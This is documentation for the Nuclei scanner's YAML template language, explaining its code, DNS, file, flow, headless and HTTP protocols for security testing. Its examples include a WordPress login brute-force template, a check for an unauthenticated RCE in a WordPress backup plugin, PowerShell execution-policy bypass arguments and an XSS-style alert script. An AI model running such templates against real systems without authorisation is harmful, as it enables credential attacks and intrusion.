Nuclei templates are based on the concepts of `YAML` based template files that define how the requests will be sent and processed. This allows easy extensibility capabilities to nuclei. The templates are written in `YAML` which specifies a simple human-readable format to quickly define the execution process.
## Universal Language for Vulnerabilities
Nuclei Templates offer a streamlined way to identify and communicate vulnerabilities, combining essential details like severity ratings and detection methods. This open-source, community-developed tool accelerates threat response and is widely recognized in the cybersecurity world.
Learn more about nuclei templates as a universal language for exploitable vulnerabilities [on our blog](https://blog.projectdiscovery.io/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities/).
## Learn more
Let's dive into the world of Nuclei templates! Use the links on the left or those below to learn more.
Learn what makes up the structure of a nuclei template
Get started making simple HTTP requests with Nuclei
Watch a video on writing your first nuclei template!
Nuclei thrives on community contributions. Submit your templates to be used by security experts everywhere!
# Code Protocol
Learn about using external code with Nuclei
Nuclei enables the execution of external code on the host operating system. This feature allows security researchers, pentesters, and developers to extend the capabilities of Nuclei and perform complex actions beyond the scope of regular supported protocol-based testing.
By leveraging this capability, Nuclei can interact with the underlying operating system and execute custom scripts or commands, opening up a wide range of possibilities. It enables users to perform tasks such as system-level configurations, file operations, network interactions, and more. This level of control and flexibility empowers users to tailor their security testing workflows according to their specific requirements.
To write code template, a code block is used to indicate the start of the requests for the template. This block marks the beginning of the code-related instructions.
```yaml
# Start the requests for the template right here
code:
```
## Engine
To execute the code, a list of language interpreters, which are installed or available on the system environment, is specified. These interpreters can be and not limited to `bash` `sh` `py` `python3`, `go`, `ps`, among others, and they are searched sequentially until a suitable one is found. The identifiers for these interpreters should correspond to their respective names or identifiers recognized by the system environment.
```yaml
- engine:
- py
- python3
```
The code to be executed can be provided either as an external file or as a code snippet directly within the template.
For an external file:
```yaml
source: helpers/code/pyfile.py
```
For a code snippet:
```yaml
source: |
import sys
print("hello from " + sys.stdin.read())
```
The target is passed to the template via stdin, and the output of the executed code is available for further processing in matchers and extractors. In the case of the Code protocol, the response part represents all data printed to stdout during the execution of the code.
## Parts
Valid `part` values supported by **Code** protocol for Matchers / Extractor are -
| Value | Description |
| -------- | ---------------------------------------------------- |
| response | execution output (trailing whitespaces are filtered) |
| stderr | Raw Stderr Output(if any) |
The provided example demonstrates the execution of a bash and python code snippet within the template. The specified engines are searched in the given order, and the code snippet is executed accordingly. Additionally, dynamic template variables are used in the code snippet, which are replaced with their respective values during the execution of the template which shows the flexibility and customization that can be achieved using this protocol.
```yaml
id: code-template
info:
name: example code template
author: pdteam
severity: info
variables:
OAST: "{{interactsh-url}}"
code:
- engine:
- sh
- bash
source: |
echo "$OAST" | base64
- engine:
- py
- python3
source: |
import base64
import os
text = os.getenv('OAST')
text_bytes = text.encode('utf-8')
base64_bytes = base64.b64encode(text_bytes)
base64_text = base64_bytes.decode('utf-8')
print(base64_text)
http:
- method: GET
path:
- "{{BaseURL}}/?x={{code_1_response}}"
- "{{BaseURL}}/?x={{code_2_response}}"
# digest: 4a0a0047304502202ce8fe9f5992782da6ba59da4e8ebfde9f19a12e247adc507040e9f1f1124b4e022100cf0bc7a44a557a6655f79a2b4789e103f5099f0f81a8d1bc4ad8aabe7829b1c5:8eeeebe39b11b16384b45bc7e9163000
```
Apart from required fields mentioned above, Code protocol also supports following optional fields to further customize the execution of code.
## Args
Args are arguments that are sent to engine while executing the code. For example if we want to bypass execution policy in powershell for specific template this can be done by adding following args to the template.
```yaml
- engine:
- powershell
- powershell.exe
args:
- -ExecutionPolicy
- Bypass
- -File
```
## Pattern
Pattern field can be used to customize name / extension of temporary file while executing a code snippet in a template
```yaml
pattern: "*.ps1"
```
adding `pattern: "*.ps1"` will make sure that name of temporary file given pattern.
## Examples
This code example shows a basic response based on DSL.
```yaml
id: code-template
info:
name: example code template
author: pdteam
severity: info
self-contained: true
code:
- engine:
- py
- python3
source: |
print("Hello World")
extractors:
- type: dsl
dsl:
- response
# digest: 4a0a0047304502204576db451ff35ea9a13c107b07a6d74f99fd9a78f5c2316cc3dece411e7d5a2b022100a36db96f2a56492147ca3e7de3c4d36b8e1361076a70924061790003958c4ef3:c40a3a04977cdbf9dca31c1002ea8279
```
Below is a example code template where we are executing a powershell script while customizing behaviour of execution policy and setting pattern to `*.ps1`
```yaml
id: ps1-code-snippet
info:
name: ps1-code-snippet
author: pdteam
severity: info
description: |
ps1-code-snippet
tags: code
code:
- engine:
- powershell
- powershell.exe
args:
- -ExecutionPolicy
- Bypass
- -File
pattern: "*.ps1"
source: |
$stdin = [Console]::In
$line = $stdin.ReadLine()
Write-Host "hello from $line"
matchers:
- type: word
words:
- "hello from input"
# digest: 4a0a00473045022100eb01da6b97893e7868c584f330a0cd52df9bddac005860bb8595ba5b8aed58c9022050043feac68d69045cf320cba9298a2eb2e792ea4720d045d01e803de1943e7d:4a3eb6b4988d95847d4203be25ed1d46
```
## Running Code Templates
By default Nuclei will not execute code templates. To enable code protocol execution, `-code` flag needs to be explicitly passed to nuclei.
```bash
nuclei -t code-template.yaml -code
```
## Learn More
For more examples, please refer to example [code-templates](https://github.com/projectdiscovery/nuclei/tree/main/integration_tests/protocols/code) in integration tests.
It's important to exercise caution while utilizing this feature, as executing external code on the host operating system carries inherent risks. It is crucial to ensure that the executed code is secure, thoroughly tested, and does not pose any unintended consequences or security risks to the target system.
To ensure the integrity of the code in your templates, be sure to sign your templates using the [Template Signing](/templates/reference/template-signing) methods.
# DNS Protocol
Learn about using DNS with Nuclei
DNS protocol can be modelled in Nuclei with ease. Fully Customizable DNS requests can be sent by Nuclei to nameservers and matching/extracting can be performed on their response.
DNS Requests start with a **dns** block which specifies the start of the requests for the template.
```yaml
# Start the requests for the template right here
dns:
```
### Type
First thing in the request is **type**. Request type can be **A**, **NS**, **CNAME**, **SOA**, **PTR**, **MX**, **TXT**, **AAAA**.
```yaml
# type is the type for the dns request
type: A
```
### Name
The next part of the requests is the DNS **name** to resolve. Dynamic variables can be placed in the path to modify its value on runtime. Variables start with `{{` and end with `}}` and are case-sensitive.
1. **FQDN** - variable is replaced by the hostname/FQDN of the target on runtime.
An example name value:
```yaml
name: {{FQDN}}.com
# This value will be replaced on execution with the FQDN.
# If FQDN is https://this.is.an.example then the
# name will get replaced to the following: this.is.an.example.com
```
As of now the tool supports only one name per request.
### Class
Class type can be **INET**, **CSNET**, **CHAOS**, **HESIOD**, **NONE** and **ANY**. Usually it's enough to just leave it as **INET**.
```yaml
# method is the class for the dns request
class: inet
```
### Recursion
Recursion is a boolean value, and determines if the resolver should only return cached results, or traverse the whole dns root tree to retrieve fresh results. Generally it's better to leave it as **true**.
```yaml
# Recursion is a boolean determining if the request is recursive
recursion: true
```
### Retries
Retries is the number of attempts a dns query is retried before giving up among different resolvers. It's recommended a reasonable value, like **3**.
```yaml
# Retries is a number of retries before giving up on dns resolution
retries: 3
```
### Matchers / Extractor Parts
Valid `part` values supported by **DNS** protocol for Matchers / Extractor are -
| Value | Description |
| ---------------- | --------------------------- |
| request | DNS Request |
| rcode | DNS Rcode |
| question | DNS Question Message |
| extra | DNS Message Extra Field |
| answer | DNS Message Answer Field |
| ns | DNS Message Authority Field |
| raw / all / body | Raw DNS Message |
### **Example DNS Template**
The final example template file for performing `A` query, and check if CNAME and A records are in the response is as follows:
```yaml
id: dummy-cname-a
info:
name: Dummy A dns request
author: mzack9999
severity: info
description: Checks if CNAME and A record is returned.
dns:
- name: "{{FQDN}}"
type: A
class: inet
recursion: true
retries: 3
matchers:
- type: word
words:
# The response must contain a CNAME record
- "IN\tCNAME"
# and also at least 1 A record
- "IN\tA"
condition: and
```
More complete examples are provided [here](/templates/protocols/dns-examples)
# File Protocol
Learn about using Nuclei to work with the local file system
## Overview
Nuclei allows modelling templates that can match/extract on the local file system.
```yaml
# Start of file template block
file:
```
## Extensions
To match on all extensions (except the ones in default denylist), use the following -
```yaml
extensions:
- all
```
You can also provide a list of custom extensions that should be matched upon.
```yaml
extensions:
- py
- go
```
A denylist of extensions can also be provided. Files with these extensions will not be processed by nuclei.
```yaml
extensions:
- all
denylist:
- go
- py
- txt
```
By default, certain extensions are excluded in nuclei file module. A list of these is provided below-
```
3g2,3gp,7z,apk,arj,avi,axd,bmp,css,csv,deb,dll,doc,drv,eot,exe,
flv,gif,gifv,gz,h264,ico,iso,jar,jpeg,jpg,lock,m4a,m4v,map,mkv,
mov,mp3,mp4,mpeg,mpg,msi,ogg,ogm,ogv,otf,pdf,pkg,png,ppt,psd,rar,
rm,rpm,svg,swf,sys,tar,tar.gz,tif,tiff,ttf,txt,vob,wav,webm,wmv,
woff,woff2,xcf,xls,xlsx,zip
```
## More Options
**max-size** parameter can be provided which limits the maximum size (in bytes) of files read by nuclei engine.
As default the `max-size` value is 5 MB (5242880), Files larger than the `max-size` will not be processed.
***
**no-recursive** option disables recursive walking of directories / globs while input is being processed for file module of nuclei.
## Matchers / Extractors
**File** protocol supports 2 types of Matchers -
| Matcher Type | Part Matched |
| ------------ | ------------ |
| word | all |
| regex | all |
| Extractors Type | Part Matched |
| --------------- | ------------ |
| word | all |
| regex | all |
## **Example File Template**
The final example template file for a Private Key detection is provided below.
```yaml
id: google-api-key
info:
name: Google API Key
author: pdteam
severity: info
file:
- extensions:
- all
- txt
extractors:
- type: regex
name: google-api-key
regex:
- "AIza[0-9A-Za-z\\-_]{35}"
```
```bash
# Running file template on http-response/ directory
nuclei -t file.yaml -target http-response/
# Running file template on output.txt
nuclei -t file.yaml -target output.txt
```
More complete examples are provided [here](/templates/protocols/file-examples)
# Flow Protocol
Learn about the template flow engine in Nuclei v3
## Overview
The template flow engine was introduced in nuclei v3, and brings two significant enhancements to Nuclei:
* The ability to [conditionally execute requests](#conditional-execution)
* The [orchestration of request execution](#request-execution-orchestration)
These features are implemented using JavaScript (ECMAScript 5.1) via the [goja](https://github.com/dop251/goja) backend.
## Conditional Execution
Many times when writing complex templates we might need to add some extra checks (or conditional statements) before executing certain part of request.
An ideal example of this would be when [bruteforcing wordpress login](https://cloud.projectdiscovery.io/public/wordpress-weak-credentials) with default usernames and passwords, but if we carefully re-evaluate this template, we can see that template is sending 276 requests without even checking, if the url actually exists or target site is actually a wordpress site.
With addition of flow in Nuclei v3 we can re-write this template to first check if target is a wordpress site, if yes then bruteforce login with default credentials and this can be achieved by simply adding one line of content i.e `flow: http(1) && http(2)` and nuclei will take care of everything else.
```yaml
id: wordpress-bruteforce
info:
name: WordPress Login Bruteforce
author: pdteam
severity: high
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-login.php"
matchers:
- type: word
words:
- "WordPress"
- method: POST
path:
- "{{BaseURL}}/wp-login.php"
body: |
log={{username}}&pwd={{password}}&wp-submit=Log+In
attack: clusterbomb
payloads:
users: helpers/wordlists/wp-users.txt
passwords: helpers/wordlists/wp-passwords.txt
matchers:
- type: dsl
dsl:
- status_code == 302
- contains_all(header, "/wp-admin","wordpress_logged_in")
condition: and
```
The update template now seems straight forward and easy to understand. we are first checking if target is a wordpress site and then executing bruteforce requests. This is just a simple example of conditional execution and flow accepts any Javascript (ECMAScript 5.1) expression/code so you are free to craft any conditional execution logic you want.
## Request Execution Orchestration
Flow is a powerful Nuclei feature that provides enhanced orchestration capabilities for executing requests. The simplicity of conditional execution is just the beginning. With flow, you can:
* Iterate over a list of values and execute a request for each one
* Extract values from a request, iterate over them, and perform another request for each
* Get and set values within the template context (global variables)
* Write output to stdout for debugging purposes or based on specific conditions
* Introduce custom logic during template execution
* Use ECMAScript 5.1 JavaScript features to build and modify variables at runtime
* Update variables at runtime and use them in subsequent requests.
Think of request execution orchestration as a bridge between JavaScript and Nuclei, offering two-way interaction within a specific template.
**Practical Example: Vhost Enumeration**
To better illustrate the power of flow, let's consider developing a template for vhost (virtual host) enumeration. This set of tasks typically requires writing a new tool from scratch. Here are the steps we need to follow:
1. Retrieve the SSL certificate for the provided IP (using tlsx)
* Extract `subject_cn` (CN) from the certificate
* Extract `subject_an` (SAN) from the certificate
* Remove wildcard prefixes from the values obtained in the steps above
2. Bruteforce the request using all the domains found from the SSL request
You can utilize flow to simplify this task. The JavaScript code below orchestrates the vhost enumeration:
```javascript
ssl();
for (let vhost of iterate(template["ssl_domains"])) {
set("vhost", vhost);
http();
}
```
In this code, we've introduced 5 extra lines of JavaScript. This allows the template to perform vhost enumeration. The best part? You can run this at scale with all features of Nuclei, using supported inputs like ASN, CIDR, URL.
Let's break down the JavaScript code:
1. `ssl()`: This function executes the SSL request.
2. `template["ssl_domains"]`: Retrieves the value of `ssl_domains` from the template context.
3. `iterate()`: Helper function that iterates over any value type while handling empty or null values.
4. `set("vhost", vhost)`: Creates a new variable `vhost` in the template and assigns the `vhost` variable's value to it.
5. `http()`: This function conducts the HTTP request.
By understanding and taking advantage of Nuclei's `flow`, you can redefine the way you orchestrate request executions, making your templates much more powerful and efficient.
Here is working template for vhost enumeration using flow:
```yaml
id: vhost-enum-flow
info:
name: vhost enum flow
author: tarunKoyalwar
severity: info
description: |
vhost enumeration by extracting potential vhost names from ssl certificate.
flow: |
ssl();
for (let vhost of iterate(template["ssl_domains"])) {
set("vhost", vhost);
http();
}
ssl:
- address: "{{Host}}:{{Port}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{vhost}}
matchers:
- type: dsl
dsl:
- status_code != 400
- status_code != 502
extractors:
- type: dsl
dsl:
- '"VHOST: " + vhost + ", SC: " + status_code + ", CL: " + content_length'
```
## JS Bindings
This section contains a brief description of all nuclei JS bindings and their usage.
### Protocol Execution Function
In nuclei, any listed protocol can be invoked or executed in JavaScript using the `protocol_name()` format. For example, you can use `http()`, `dns()`, `ssl()`, etc.
If you want to execute a specific request of a protocol (refer to nuclei-flow-dns for an example), it can be achieved by passing either:
* The index of that request in the protocol (e.g.,`dns(1)`, `dns(2)`)
* The ID of that request in the protocol (e.g., `dns("extract-vps")`, `http("probe-http")`)
For more advanced scenarios where multiple requests of a single protocol need to be executed, you can specify their index or ID one after the other (e.g., dns("extract-vps","1")).
This flexibility in using either index numbers or ID strings to call specific protocol requests provides controls for tailored execution, allowing you to build more complex and efficient workflows. more complex use cases multiple requests of a single protocol can be executed by just specifying their index or id one after another (ex: `dns("extract-vps","1")`)
### Iterate Helper Function
Iterate is a nuclei js helper function which can be used to iterate over any type of value like **array**, **map**, **string**, **number** while handling empty/nil values.
This is addon helper function from nuclei to omit boilerplate code of checking if value is empty or not and then iterating over it
```javascript
iterate(123,{"a":1,"b":2,"c":3})
// iterate over array with custom separator
iterate([1,2,3,4,5], " ")
```
### Set Helper Function
When iterating over a values/array or some other use case we might want to invoke a request with custom/given value and this can be achieved by using `set()` helper function. When invoked/called it adds given variable to template context (global variables) and that value is used during execution of request/protocol. the format of `set()` is `set("variable_name",value)` ex: `set("username","admin")`.
```javascript
for (let vhost of myArray) {
set("vhost", vhost);
http(1)
}
```
**Note:** In above example we used `set("vhost", vhost)` which added `vhost` to template context (global variables) and then called `http(1)` which used this value in request.
### Template Context
A template context is nothing but a map/jsonl containing all this data along with internal/unexported data that is only available at runtime (ex: extracted values from previous requests, variables added using `set()` etc). This template context is available in javascript as `template` variable and can be used to access any data from it. ex: `template["dns_cname"]`, `template["ssl_subject_cn"]` etc.
```javascript
template["ssl_domains"] // returns value of ssl_domains from template context which is available after executing ssl request
template["ptrValue"] // returns value of ptrValue which was extracted using regex with internal: true
```
Lot of times we don't known what all data is available in template context and this can be easily found by printing it to stdout using `log()` function
```javascript
log(template)
```
### Log Helper Function
It is a nuclei js alternative to `console.log` and this pretty prints map data in readable format
**Note:** This should be used for debugging purposed only as this prints data to stdout
### Dedupe
Lot of times just having arrays/slices is not enough and we might need to remove duplicate variables . for example in earlier vhost enumeration we did not remove any duplicates as there is always a chance of duplicate values in `ssl_subject_cn` and `ssl_subject_an` and this can be achieved by using `dedupe()` object. This is nuclei js helper function to abstract away boilerplate code of removing duplicates from array/slice
```javascript
let uniq = new Dedupe(); // create new dedupe object
uniq.Add(template["ptrValue"])
uniq.Add(template["ssl_subject_cn"]);
uniq.Add(template["ssl_subject_an"]);
log(uniq.Values())
```
And that's it, this automatically converts any slice/array to map and removes duplicates from it and returns a slice/array of unique values
> Similar to DSL helper functions . we can either use built in functions available with `Javscript (ECMAScript 5.1)` or use DSL helper functions and its upto user to decide which one to uses.
### Skip Internal Matchers in MultiProtocol / Flow Templates
Before nuclei v3.1.4 , A template like [`CVE-2023-43177`](https://github.com/projectdiscovery/nuclei-templates/blob/c5be73e328ebd9a0c122ea0324f60bbdd7eb940d/http/cves/2023/CVE-2023-43177.yaml#L28) which has multiple requests/protocols and uses `flow` for logic, used to only return one result but it conflicted with logic when `for` loop was used in `flow` to fix this nuclei engine from v3.1.4 will print all events/results in a template and template writers can use `internal: true` in matchers to skip printing of events/results just like dynamic extractors.
Note: this is only relevant if matchers/extractors are used in previous requests/protocols
Example of [`CVE-2023-6553`](https://github.com/projectdiscovery/nuclei-templates/blob/c5be73e328ebd9a0c122ea0324f60bbdd7eb940d/http/cves/2023/CVE-2023-6553.yaml#L21) with new `internal: true` logic would be
```yaml
id: CVE-2023-6553
info:
name: Worpress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution
author: FLX
severity: critical
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Backup Migration")'
condition: and
internal: true # <- updated logic (this will skip printing this event/result)
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"
headers:
Content-Dir: "{{rand_text_alpha(10)}}"
matchers:
- type: dsl
dsl:
- 'len(body) == 0'
- 'status_code == 200'
- '!contains(body, "Incorrect parameters")'
condition: and
```
# Headless Protocol
Learn about using a headless browser with Nuclei
Nuclei supports automation of a browser with simple DSL. Headless browser engine can be fully customized and user actions can be scripted allowing complete control over the browser. This allows for a variety of unique and custom workflows.
```yaml
# Start the requests for the template right here
headless:
```
## Actions
An action is a single piece of Task for the Nuclei Headless Engine. Each action manipulates the browser state in some way, and finally leads to the state that we are interested in capturing.
Nuclei supports a variety of actions. A list of these Actions along with their arguments are given below:
### navigate
Navigate visits a given URL. url field supports variables like `{{BaseURL}}`, `{{Hostname}}` to customize the request fully.
```yaml
action: navigate
args:
url: "{{BaseURL}}
```
### script
Script runs a JS code on the current browser page. At the simplest level, you can just provide a `code` argument with the JS snippet you want to execute, and it will be run on the page.
```yaml
action: script
args:
code: alert(document.domain)
```
Suppose you want to run a matcher on a JS object to inspect its value. This type of data extraction use cases are also supported with nuclei headless. As an example, let's say the application sets an object called `window.random-object` with a value, and you want to match on that value.
```yaml
- action: script
args:
code: window.random-object
name: script-name
...
matchers:
- type: word
part: script-name
words:
- "some-value"
```
Nuclei supports running some custom Javascript, before the page load with the `hook` argument. This will always run the provided Javascript, before any of the pages load.
The example provided hooks `window.alert` so that the alerts that are generated by the application do not stop the crawler.
```yaml
- action: script
args:
code: (function() { window.alert=function(){} })()
hook: true
```
This is one use case, there are many more use cases of function hooking such as DOM XSS Detection and Javascript-Injection based testing techniques. Further examples are provided on examples page.
### click
Click simulates clicking with the Left-Mouse button on an element specified by a selector.
```yaml
action: click
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
Nuclei supports a variety of selector types, including but not limited to XPath, Regex, CSS, etc. For more information about selectors, see [here](#selectors).
### rightclick
RightClick simulates clicking with the Right-Mouse button on an element specified by a selector.
```yaml
action: rightclick
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
### text
Text simulates typing something into an input with Keyboard. Selectors can be used to specify the element to type in.
```yaml
action: text
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
value: username
```
### screenshot
Screenshots takes the screenshots of a page and writes it to disk. It supports both full page and normal screenshots.
```yaml
action: screenshot
args:
to: /root/test/screenshot-web
```
If you require full page screenshot, it can be achieved with `fullpage: true` option in the args.
```yaml
action: screenshot
args:
to: /root/test/screenshot-web
fullpage: true
```
### time
Time enters values into time inputs on pages in RFC3339 format.
```yaml
action: time
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
value: 2006-01-02T15:04:05Z07:00
```
### select
Select performs selection on an HTML Input by a selector.
```yaml
action: select
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
selected: true
value: option[value=two]
selector: regex
```
### files
Files handles a file upload input on the webpage.
```yaml
action: files
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
value: /root/test/payload.txt
```
### waitfcp
WaitFCP waits for the first piece of meaningful content, such as text or an image, indicating that the page is becoming useful.
```yaml
action: waitfcp
```
### waitfmp
WaitFMP waits for the First Meaningful Paint event, allowing users to proceed when content is visually ready.
```yaml
action: waitfmp
```
### waitdom
WaitDOM waits for the `DOMContentLoaded` event, indicating that the HTML has been loaded and parsed, but without waiting for stylesheets, images, and subframes to finish loading.
```yaml
action: waitdom
```
### waitload
WaitLoad waits the entire page, including dependent resources like stylesheets and images, has been fully loaded.
```yaml
action: waitload
```
### waitidle
WaitIdle waits until the page completely stopped making network requests and reaches a network idle state, indicating that all resources have been loaded.
```yaml
action: waitidle
```
### waitstable
WaitStable waits until the page is stable for *N* duration *(default is `1s`)*.
```yaml
action: waitstable
args:
duration: 5s
```
### waitdialog
WaitDialog will wait for a JavaScript dialog (`alert`, `confirm`, `prompt`, or `onbeforeunload`) to be initialized and then automatically accept it.
```yaml
action: waitdialog
name: alert
args:
max-duration: 5s # (Optional. Default 10s.)
```
This action is useful for detecting triggered XSS payloads with a high level of accuracy and a low rate of false positives.
The `name` property MUST be explicitly defined to ensure the output variable is available for later use by `matchers` or `extractors` wihtin your template. See the example [here](/templates/protocols/headless-examples#xss-detection).
**Output variables:**
* **NAME** *(boolean)*, indicator of JavaScript dialog triggered.
* **NAME\_type** *(string)*, dialog type (`alert`, `confirm`, `prompt`, or `onbeforeunload`).
* **NAME\_message** *(string)*, displayed message dialog.
### getresource
GetResource returns the src attribute for an element.
```yaml
action: getresource
name: extracted-value-src
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
### extract
Extract extracts either the Text for an HTML Node, or an attribute as specified by the user.
The below code will extract the Text for the given XPath Selector Element, which can then also be matched upon by name `extracted-value` with matchers and extractors.
```yaml
action: extract
name: extracted-value
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
An attribute can also be extracted for an element. For example -
```yaml
action: extract
name: extracted-value-href
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
target: attribute
attribute: href
```
### setmethod
SetMethod overrides the method for the request.
```yaml
action: setmethod
args:
part: request
method: DELETE
```
### addheader
AddHeader adds a header to the requests / responses. This does not overwrite any pre-existing headers.
```yaml
action: addheader
args:
part: response # can be request too
key: Content-Security-Policy
value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
```
### setheader
SetHeader sets a header in the requests / responses.
```yaml
action: setheader
args:
part: response # can be request too
key: Content-Security-Policy
value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
```
### deleteheader
DeleteHeader deletes a header from requests / responses.
```yaml
action: deleteheader
args:
part: response # can be request too
key: Content-Security-Policy
```
### setbody
SetBody sets the body for a request / response.
```yaml
action: setbody
args:
part: response # can be request too
body: '{"success":"ok"}'
```
### waitevent
WaitEvent waits for an event to trigger on the page.
```yaml
action: waitevent
args:
event: 'Page.loadEventFired'
```
The list of events supported are listed [here](https://github.com/go-rod/rod/blob/master/lib/proto/definitions.go).
### keyboard
Keyboard simulates a single key-press on the keyboard.
```yaml
action: keyboard
args:
keys: '\r' # this simulates pressing enter key on keyboard
```
`keys` argument accepts key-codes.
### debug
Debug adds a delay of 5 seconds between each headless action and also shows a trace of all the headless events occurring in the browser.
> Note: Only use this for debugging purposes, don't use this in production templates.
```yaml
action: debug
```
### sleep
Sleeps makes the browser wait for a specified duration in seconds. This is also useful for debugging purposes.
```yaml
action: sleep
args:
duration: 5
```
## Selectors
Selectors are how nuclei headless engine identifies what element to execute an action on. Nuclei supports getting selectors by including a variety of options -
| Selector | Description |
| -------------------- | --------------------------------------------------- |
| `r` / `regex` | Element matches CSS Selector and Text Matches Regex |
| `x` / `xpath` | Element matches XPath selector |
| `js` | Return elements from a JS function |
| `search` | Search for a query (can be text, XPATH, CSS) |
| `selector` (default) | Element matches CSS Selector |
## Matchers / Extractor Parts
Valid `part` values supported by **Headless** protocol for Matchers / Extractor are -
| Value | Description |
| ----------------- | ------------------------------- |
| request | Headless Request |
| `` | Action names with stored values |
| raw / body / data | Final DOM response from browser |
## Example Headless Templates
An example headless template to automatically login into DVWA is provided below -
```yaml
id: dvwa-headless-automatic-login
info:
name: DVWA Headless Automatic Login
author: pdteam
severity: high
headless:
- steps:
- args:
url: "{{BaseURL}}/login.php"
action: navigate
- action: waitload
- args:
by: xpath
xpath: /html/body/div/div[2]/form/fieldset/input
action: click
- action: waitload
- args:
by: xpath
value: admin
xpath: /html/body/div/div[2]/form/fieldset/input
action: text
- args:
by: xpath
xpath: /html/body/div/div[2]/form/fieldset/input[2]
action: click
- action: waitload
- args:
by: xpath
value: password
xpath: /html/body/div/div[2]/form/fieldset/input[2]
action: text
- args:
by: xpath
xpath: /html/body/div/div[2]/form/fieldset/p/input
action: click
- action: waitload
matchers:
- part: resp
type: word
words:
- "You have logged in as"
```
More complete examples are provided [here](/templates/protocols/headless-examples).
# Basic HTTP Protocol
Learn about using Basic HTTP with Nuclei
Nuclei offers extensive support for various features related to HTTP protocol. Raw and Model based HTTP requests are supported, along with options Non-RFC client requests support too. Payloads can also be specified and raw requests can be transformed based on payload values along with many more capabilities that are shown later on this Page.
HTTP Requests start with a `request` block which specifies the start of the requests for the template.
```yaml
# Start the requests for the template right here
http:
```
## Method
Request method can be **GET**, **POST**, **PUT**, **DELETE**, etc. depending on the needs.
```yaml
# Method is the method for the request
method: GET
```
**Redirects**
Redirection conditions can be specified per each template. By default, redirects are not followed. However, if desired, they can be enabled with `redirects: true` in request details. 10 redirects are followed at maximum by default which should be good enough for most use cases. More fine grained control can be exercised over number of redirects followed by using `max-redirects` field.
An example of the usage:
```yaml
http:
- method: GET
path:
- "{{BaseURL}}/login.php"
redirects: true
max-redirects: 3
```
Currently redirects are defined per template, not per request.
## Path
The next part of the requests is the **path** of the request path. Dynamic variables can be placed in the path to modify its behavior on runtime.
Variables start with `{{` and end with `}}` and are case-sensitive.
`{{BaseURL}}` - This will replace on runtime in the request by the input URL as specified in the target file.
`{{RootURL}}` - This will replace on runtime in the request by the root URL as specified in the target file.
`{{Hostname}}` - Hostname variable is replaced by the hostname including port of the target on runtime.
`{{Host}}` - This will replace on runtime in the request by the input host as specified in the target file.
`{{Port}}` - This will replace on runtime in the request by the input port as specified in the target file.
`{{Path}}` - This will replace on runtime in the request by the input path as specified in the target file.
`{{File}}` - This will replace on runtime in the request by the input filename as specified in the target file.
`{{Scheme}}` - This will replace on runtime in the request by protocol scheme as specified in the target file.
An example is provided below - [https://example.com:443/foo/bar.php](https://example.com:443/foo/bar.php)
| Variable | Value |
| -------------- | -------------------------------------------------------------------------- |
| `{{BaseURL}}` | [https://example.com:443/foo/bar.php](https://example.com:443/foo/bar.php) |
| `{{RootURL}}` | [https://example.com:443](https://example.com:443) |
| `{{Hostname}}` | example.com:443 |
| `{{Host}}` | example.com |
| `{{Port}}` | 443 |
| `{{Path}}` | /foo |
| `{{File}}` | bar.php |
| `{{Scheme}}` | https |
Some sample dynamic variable replacement examples:
```yaml
path: "{{BaseURL}}/.git/config"
# This path will be replaced on execution with BaseURL
# If BaseURL is set to https://abc.com then the
# path will get replaced to the following: https://abc.com/.git/config
```
Multiple paths can also be specified in one request which will be requested for the target.
## Headers
Headers can also be specified to be sent along with the requests. Headers are placed in form of key/value pairs. An example header configuration looks like this:
```yaml
# headers contain the headers for the request
headers:
# Custom user-agent header
User-Agent: Some-Random-User-Agent
# Custom request origin
Origin: https://google.com
```
## Body
Body specifies a body to be sent along with the request. For instance:
```yaml
# Body is a string sent along with the request
body: "{\"some random JSON\"}"
# Body is a string sent along with the request
body: "admin=test"
```
## Session
To maintain a cookie-based browser-like session between multiple requests, cookies are reused by default. This is beneficial when you want to maintain a session between a series of requests to complete the exploit chain or to perform authenticated scans. If you need to disable this behavior, you can use the disable-cookie field.
```yaml
# disable-cookie accepts boolean input and false as default
disable-cookie: true
```
## Request Condition
Request condition allows checking for the condition between multiple requests for writing complex checks and exploits involving various HTTP requests to complete the exploit chain.
The functionality will be automatically enabled if DSL matchers/extractors contain numbers as a suffix with respective attributes.
For example, the attribute `status_code` will point to the effective status code of the current request/response pair in elaboration. Previous responses status codes are accessible by suffixing the attribute name with `_n`, where n is the n-th ordered request 1-based. So if the template has four requests and we are currently at number 3:
* `status_code`: will refer to the response code of request number 3
* `status_code_1` and `status_code_2` will refer to the response codes of the sequential responses number one and two
For example with `status_code_1`, `status_code_3`, and`body_2`:
```yaml
matchers:
- type: dsl
dsl:
- "status_code_1 == 404 && status_code_2 == 200 && contains((body_2), 'secret_string')"
```
Request conditions might require more memory as all attributes of previous responses are kept in memory
## Example HTTP Template
The final template file for the `.git/config` file mentioned above is as follows:
```yaml
id: git-config
info:
name: Git Config File
author: Ice3man
severity: medium
description: Searches for the pattern /.git/config on passed URLs.
http:
- method: GET
path:
- "{{BaseURL}}/.git/config"
matchers:
- type: word
words:
- "[core]"
```
